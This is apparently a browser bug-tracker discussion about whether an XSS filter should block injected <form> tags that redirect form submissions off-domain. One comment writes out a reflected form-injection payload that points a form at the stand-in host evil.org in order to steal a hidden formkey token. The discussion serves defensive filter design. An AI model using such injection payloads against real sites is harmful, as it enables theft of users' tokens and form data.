Yeah, we should only need to block JavaScript URLs. (This is a false positive, so not a security bug.)

Though it is a false positive according to the design, it is in-fact protecting against <form> injection which is good. It is the same with <iframe> injection where the src attribute is removed even if the src is not a JavaScript URL . One more corner case is that <iframe> from a same domain can be injected successfully. I assume this as a design decision . p.s I couldn't find an example in which detecting an injected form is a false positive

Looking at this old XSSAuditor bug, I think that blocking form actions to off-domain http locations when a <form> is injected is the right thing to do (i.e. we need to block more than just the javascript URLs as Adam sugests in Comment #1). Just so we're all on the same page, the case I'm considering (apologies if this is obvious) is when page contains: <form action="http://good.com"> <input type="text" name="quantity" value="2"> <input type="hidden" name="formkey" value="91812727123812"> <input type="submit"> </form> and the "quantity" input element contains an injection, and we reflect from the URL say ...?quantity="></form><form action="http://evil.org"> resulting in page: <form action="http://good.com"> <input type="text" name="quantity" value=""></form><form action="http://evil.org"> <input type="hidden" name="formkey" value="91812727123812"> <input type="submit"> </form> So when the user hits submit, we steal his formkey token (or other information from input fields). Please re-open if you disagree, or if you find that this is being triggered in the absence of both a reflected "<form" tag and a reflected "action" attribute. Thanks heaps.